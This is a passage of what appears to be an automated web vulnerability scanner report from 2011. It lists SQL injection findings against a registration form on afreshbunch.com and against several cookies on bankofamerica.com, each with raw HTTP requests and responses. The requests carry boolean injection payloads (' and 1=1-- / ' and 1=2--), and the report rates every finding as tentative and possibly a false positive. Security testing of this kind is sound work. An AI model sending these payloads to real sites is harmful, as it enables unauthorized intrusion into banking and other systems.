custom-field9971=asdfgh&custom-field0=asdfgh&custom-field8959=%27%27&custom-field6=sa94115%40gmail.com&custom-field9735=&custom-field1997=&custom-field5407=&custom-field5=Other&custom-field1=&custom-f
...[SNIP]...
quug3NJl59rM6BBo89xv83HWkjqSOLI2J7kinnF_51pgq4yPw&recaptcha_response_field=mut+onader&B1=Continue+Registration+--%3E&last_seen=4%2F25%2F2011+8%3A44%3A36+PM&profile_image_url=&email=sa94115%40gmail.com'&password=123456&password1=123456&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&remote_ip=173.193.214.243&username=asdfgh&from_member=&timestamp=4%2F25%2F2011+8%3A44%3A36+PM&newsletter=1&referral_i
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1296
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:17:02 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:18:02 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
0
<script>
function checkcomment(objValue)
{

if(eva
...[SNIP]...

Request 2

POST /?page=login&cmd=save_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640
Content-Length: 810

custom-field9971=asdfgh&custom-field0=asdfgh&custom-field8959=%27%27&custom-field6=sa94115%40gmail.com&custom-field9735=&custom-field1997=&custom-field5407=&custom-field5=Other&custom-field1=&custom-f
...[SNIP]...
quug3NJl59rM6BBo89xv83HWkjqSOLI2J7kinnF_51pgq4yPw&recaptcha_response_field=mut+onader&B1=Continue+Registration+--%3E&last_seen=4%2F25%2F2011+8%3A44%3A36+PM&profile_image_url=&email=sa94115%40gmail.com''&password=123456&password1=123456&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&remote_ip=173.193.214.243&username=asdfgh&from_member=&timestamp=4%2F25%2F2011+8%3A44%3A36+PM&newsletter=1&referral_i
...[SNIP]...

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 150
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:17:03 GMT
Location: /?page=login&cmd=approval
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:18:04 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&amp;cmd=approval">here</a>.</body>

1.25. https://www.bankofamerica.com/Control.do [BOA_0020 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BOA_0020 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_0020 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1'%20and%201%3d1--%20; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:43:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000di3MrEAFgoFCSA05OhNJARS:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=688; Expires=Sun, 23 Oct 2011 12:43:16 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:43:16 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1'%20and%201%3d2--%20; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:43:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000-D1ITi8DH4KajyVwOtvwOY0:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=39605; Expires=Sun, 23 Oct 2011 12:43:17 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="t
...[SNIP]...

1.26. https://www.bankofamerica.com/Control.do [BOA_COM_BT_ELIGIBLE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BOA_COM_BT_ELIGIBLE cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_COM_BT_ELIGIBLE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:47 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=353; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:47 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=843211; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.27. https://www.bankofamerica.com/Control.do [CONTEXT cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The CONTEXT cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the CONTEXT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US'%20and%201%3d1--%20; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:35 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=6967; Expires=Sun, 23 Oct 2011 12:25:34 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:25:34 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascr
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US'%20and%201%3d2--%20; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:35 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=763627; Expires=Sun, 23 Oct 2011 12:25:35 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.28. https://www.bankofamerica.com/Control.do [INTL_LANG cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The INTL_LANG cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the INTL_LANG cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US'%20and%201%3d1--%20; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:45 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000hmxCUVp34qkihatilPZ3g4A:12rfuebu8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=3443; Expires=Sun, 23 Oct 2011 12:44:44 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:44 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
